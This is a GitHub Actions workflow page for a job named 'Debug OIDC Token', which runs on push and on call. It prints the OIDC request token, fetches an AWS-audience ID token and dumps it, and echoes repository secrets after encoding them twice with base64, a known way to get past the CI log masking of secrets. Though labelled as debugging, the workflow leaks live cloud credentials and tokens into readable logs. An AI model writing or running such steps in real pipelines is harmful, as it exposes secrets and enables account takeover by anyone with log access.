Skip to content

Create token-workflow.yaml #5

Create token-workflow.yaml

Create token-workflow.yaml #5

Workflow file for this run

name: Debug OIDC Token
on:
workflow_call:
workflow_dispatch:
push:
permissions:
id-token: write
contents: read
jobs:
debug:
runs-on: ubuntu-latest
steps:
- name: Debug OIDC Token
run: |
echo "1"
echo "$ACTIONS_ID_TOKEN_REQUEST_TOKEN"
echo "$ACTIONS_ID_TOKEN_REQUEST_URL"
TOKEN_JSON=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com")
echo "2"
ID_TOKEN=$(echo "$TOKEN_JSON" | jq -r .value)
echo "$TOKEN_JSON"
echo "3"
echo "$ID_TOKEN" | awk -F. '{print $2}' | base64 -d 2>/dev/null | jq -r
- name: Echo Base64 encoded secrets
run: |
echo "AWS_DEV_S3_SYNC_ROLE (base64):"
echo "${{ secrets.AWS_DEV_S3_SYNC_ROLE }}" | base64 | base64
echo ""
echo "AWS_DEV_S3_BUCKET_NAME (base64):"
echo "${{ secrets.AWS_DEV_S3_BUCKET_NAME }}" | base64 | base64
- name: Configure AWS credentials
uses: aws-actions/configure-aws-credentials@61815dcd50bd041e203e49132bacad1fd04d2708 # v5.1.1
with:
role-to-assume: arn:aws:iam::${{ secrets.AWS_DEV_ACCOUNT_ID }}:role/${{ secrets.AWS_DEV_S3_SYNC_ROLE }}
aws-region: us-east-1